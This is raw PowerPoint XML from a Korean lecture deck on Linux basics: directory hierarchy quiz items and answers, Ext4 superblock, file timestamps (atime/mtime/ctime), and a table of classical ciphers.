                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A77A644F-F155-4C5F-BB2D-27F0F1C027A8}"/>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프로세스와 프로그램 정보 및 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1000" b="0" i="0" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="222222"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="Source Sans Pro" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>하드웨어적인</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1000" b="0" i="0" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="222222"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="Source Sans Pro" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t> 정보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물리적인 하드디스크 용량을 사용하지 않고 커널에 의해 메모리에 저장됨</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="64" name="사각형: 둥근 모서리 63">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7BA7E051-526F-4AE0-B18C-AAEE0802502D}"/>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가상 파일 시스템 디렉토리</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="34380462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8" name="그룹 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C1D2BC99-C4B4-41BF-BECE-C88F7C2AD8EF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2682932" y="3101682"/>
            <a:ext cx="682613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lost+found</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수행 중 파일시스템의 이상 유</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무를 진단하고 복구하는 프로그램인 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1000" b="0" i="0" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="222222"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="Source Sans Pro" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>fsck</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1000" b="0" i="0">
                  <a:solidFill>
                    <a:srgbClr val="222222"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="Source Sans Pro" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>(file system check</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에 의해 사용되는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일반 사용자 계정으로 로그인한 상태에서는 접근 불가</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계정인 </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로 접속해야 디렉토리의 내용을 볼 수 있음</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복구 프로그램인 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>fsck</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>에 의해 사용되는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/var</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시스템에서 사용되는 동적인 파일</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
                <a:t>(</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
                <a:t>변경되는 파일</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
                <a:t>)</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
                <a:t>들 저장</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="171450" indent="-171450" algn="l">
                <a:lnSpc>
                  <a:spcPct val="150000"/>
                </a:lnSpc>
                <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:buChar char="•"/>
              </a:pPr>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
                <a:t>각종 시스템 로그 파일</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
                <a:t>, </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
                <a:t>사용자 로그인에 대한 보안 기록 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가변 자료 저장 디렉토리</a:t>
              </a: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tmp</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 수행 과정에서의 임시 파일들 저장</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파일 저장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/opt</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 제공되지 않는 프로그램을 추가로 설치할 경우 사용</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프로그램 추가 설치 디렉토리</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0674FD72-038E-4245-96EE-CA4710BB00E8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="273653" y="4445185"/>
            <a:ext cx="11720338" cy="2134110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="7030A0"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:solidFill>
                  <a:srgbClr val="F743BB"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Question </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F743BB"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0"/>
              <a:t>리눅스 기본 명령어들을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시스템의 패스워드 파일을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컴퓨터에 누가 접속했는지 기록을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chemeClr val="accent5">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0"/>
              <a:t>공유 라이브러리 디렉토리는 어떤 경로에 있는가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사용자가 설치한 응용 패키지 프로그램은 보통 어느 경로에 저장되는가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부팅 파일이 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>재대로</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0"/>
              <a:t> 복구되었는지 확인하고 싶다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0"/>
              <a:t> 리눅스 표준 계층구조 중 처음에 어떤 경로를 들어가야 하는가</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0"/>
              <a:t>? </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B050"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7C70C07D-FD6C-450F-A764-A39C1D752847}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7672646" y="4896062"/>
            <a:ext cx="966281" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>A) /bin</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="65" name="TextBox 64">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{43B3B67A-E8FF-4513-8017-74CFE540FCF4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7958528" y="5147314"/>
            <a:ext cx="966281" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>) /etc</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="66" name="TextBox 65">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3296AF48-46A3-4C37-90D9-9D9A7364E216}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8441668" y="5440429"/>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vsr</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="67" name="TextBox 66">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{29C1110A-1E79-4059-8499-760C29F3767E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4319089" y="5717428"/>
            <a:ext cx="966281" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>A) /lib</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="68" name="TextBox 67">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CC51D5AF-8A85-4B32-841D-FA4C80C97926}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5846020" y="5984796"/>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usr</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="69" name="TextBox 68">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0EB9CE4B-E646-4C32-8EB0-6330EE4AC6B5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8505216" y="6271947"/>
            <a:ext cx="2848584"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lost+found</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>  or /boot/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>lost_found</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="272933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5" grpId="0"/>
      <p:bldP spid="66" grpId="0"/>
      <p:bldP spid="67" grpId="0"/>
      <p:bldP spid="68" grpId="0"/>
      <p:bldP spid="6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8BBD6991-3BC9-4E00-8534-B3FDC21364A4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1687742" y="2447291"/>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spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4752576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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>– Ext4</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6019" y="3284059"/>
            <a:ext cx="380575" cy="380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03F4F97-0179-4ACE-80D7-7FFB078FF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0173" y="2569494"/>
            <a:ext cx="5715000" cy="2886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1947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en-US" altLang="ko-KR" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>Ext4 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>– Super </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>Block</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descr="사용자 삽입 이미지">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1B7699CD-CBE5-4CE2-AE5E-1E251E6FF3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1359" b="14001"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2429375" y="2984392"/>
            <a:ext cx="5908507" cy="26458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9562" y="2325026"/>
            <a:ext cx="659366" cy="659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41213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/TimeStamp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파일 시스템 타임스탬프</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6" name="내용 개체 틀 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FFC772F9-5DCF-4600-BF1F-B1A7A94DC5B6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3778259606"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6637535" y="2410854"/>
          <a:ext cx="3900764" cy="1227266"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="697120">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1593522546"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1459149">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1964046374"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1044102">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1853058942"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="700393">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="4027726107"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="234102">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr" latinLnBrk="1"/>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" b="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                        </a:rPr>
                        <a:t>Field</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="+mn-l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latinLnBrk="1"/>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" b="1" i="0" kern="1200">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Description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a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Example</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dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>ls(1) option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접근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read,</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exec</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-u</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변조 시간</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write, truncate</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default</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err="1">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a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                          <a:latin typeface="함초롬바탕" panose="02030504000101010101" pitchFamily="18" charset="-127"/>
                          <a:ea typeface="함초롬바탕" panose="02030504000101010101" pitchFamily="18" charset="-127"/>
                          <a:cs typeface="함초롬바탕" panose="02030504000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>c</a:t>
                      </a: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i-node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변조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chmod</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chown</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
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3803D218-21EC-4539-ABBB-C6D494F61239}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5422446" y="1866105"/>
            <a:ext cx="7008394" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>각 파일마다 세 개의 시간 필드들이 커널에 의해 관리 된다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="그림 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CD702CC9-8EE0-4542-A498-6CEFFCD582CB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="188069" y="1690688"/>
            <a:ext cx="4950471" cy="5056320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="8" name="내용 개체 틀 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3396B10F-A653-410B-A5B3-FC4F7E40F6EB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3308887898"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5422446" y="3923783"/>
          <a:ext cx="6581485" cy="2716965"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="1095087">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1593522546"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="5486398">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1964046374"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="90565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(Access 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파일이 어떤 명령이나 스크립트 등에 의해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열리거나 읽혀졌을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해당 파일을 열거나 파일 내용을 확인하는 명령어인 </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cat</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" b="1" kern="0" spc="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head</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tail</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등으로 단순히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읽혀지기만</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하는 경우에도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0678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Modify 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데이터 수정시간으로서 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US"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내용이 달라졌을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따라서 파일의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권한이나 소유자 등의 속성값을 변경할 </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때는 </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에는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영향을 미치지 않습니다</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR"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데이터를 수정하여 파일 크기 등이 변경되거나 </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하면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그리고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ls -l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명령어를 쳤을 때 출력되는 파일의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시간값</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입니다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60452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ctime </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(Change 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 혹은 각종 속성값이 변경된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시점에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소유자 등 속성값 변경에 의해 기록되며 파일이 수정될 때도 물론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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39841091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1623775771"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3693381" y="2564266"/>
          <a:ext cx="3959749" cy="1967740"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="943933">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1593522546"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="3015816">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Ceasar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Substitution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Vigenere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비즈네르</a:t>
                      </a:r>
                      <a:r>
